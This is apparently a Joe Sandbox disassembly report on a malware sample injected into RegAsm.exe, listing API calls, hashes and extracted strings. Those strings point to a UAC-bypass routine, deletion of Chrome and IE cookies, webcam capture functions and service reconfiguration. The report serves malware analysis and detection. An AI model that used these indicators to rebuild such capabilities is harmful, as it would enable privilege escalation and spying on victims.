                                                                • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                • Opcode Fuzzy Hash: 98ed44dc4caea9a8c226c7cdff5212121b7baccb751d051fcbcdd94b1bfdfefb
                                                                • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                APIs
                                                                  • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                                  • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                  • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                • _wcslen.LIBCMT ref: 0041B7F4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                • API String ID: 3286818993-122982132
                                                                • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                APIs
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                • API String ID: 1133728706-4073444585
                                                                • Opcode ID: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                • Opcode Fuzzy Hash: fca4e0d28d89a9fa445d0ae1acaca183aa99da9c1d1975f14c0158772a6bba34
                                                                • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                APIs
                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                • _free.LIBCMT ref: 100092AB
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100092B6
                                                                • _free.LIBCMT ref: 100092C1
                                                                • _free.LIBCMT ref: 10009315
                                                                • _free.LIBCMT ref: 10009320
                                                                • _free.LIBCMT ref: 1000932B
                                                                • _free.LIBCMT ref: 10009336
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                APIs
                                                                  • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                • _free.LIBCMT ref: 00450FC8
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450FD3
                                                                • _free.LIBCMT ref: 00450FDE
                                                                • _free.LIBCMT ref: 00451032
                                                                • _free.LIBCMT ref: 0045103D
                                                                • _free.LIBCMT ref: 00451048
                                                                • _free.LIBCMT ref: 00451053
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                • int.LIBCPMT ref: 004111BE
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                • String ID: (mG
                                                                • API String ID: 2536120697-4059303827
                                                                • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                APIs
                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                                  • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                • CoUninitialize.OLE32 ref: 00407664
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                • API String ID: 3851391207-1839356972
                                                                • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                • GetLastError.KERNEL32 ref: 0040BB22
                                                                Strings
                                                                • UserProfile, xrefs: 0040BAE8
                                                                • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                • API String ID: 2018770650-304995407
                                                                • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                APIs
                                                                • __allrem.LIBCMT ref: 0043ACE9
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                • __allrem.LIBCMT ref: 0043AD1C
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                • __allrem.LIBCMT ref: 0043AD51
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1992179935-0
                                                                • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                • __freea.LIBCMT ref: 10008A08
                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                • __freea.LIBCMT ref: 10008A11
                                                                • __freea.LIBCMT ref: 10008A36
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1414292761-0
                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                APIs
                                                                • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: H_prologSleep
                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                • API String ID: 3469354165-3054508432
                                                                • Opcode ID: b0885c851fcfaa11fbeaa2e4eb94ca5760e61d5ae2f9e26ba5bd1b1b7bfa12d4
                                                                • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                • Opcode Fuzzy Hash: b0885c851fcfaa11fbeaa2e4eb94ca5760e61d5ae2f9e26ba5bd1b1b7bfa12d4
                                                                • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __cftoe
                                                                • String ID:
                                                                • API String ID: 4189289331-0
                                                                • Opcode ID: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                • Opcode Fuzzy Hash: 8a4c5be280cb6c814f8e43a2c8dbee5c21d103d485289201cbd24c59527051e2
                                                                • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                APIs
                                                                • _strlen.LIBCMT ref: 10001607
                                                                • _strcat.LIBCMT ref: 1000161D
                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                • String ID:
                                                                • API String ID: 1922816806-0
                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                APIs
                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                • String ID:
                                                                • API String ID: 3594823470-0
                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                • String ID:
                                                                • API String ID: 493672254-0
                                                                • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                • _free.LIBCMT ref: 10005B2D
                                                                • _free.LIBCMT ref: 10005B55
                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
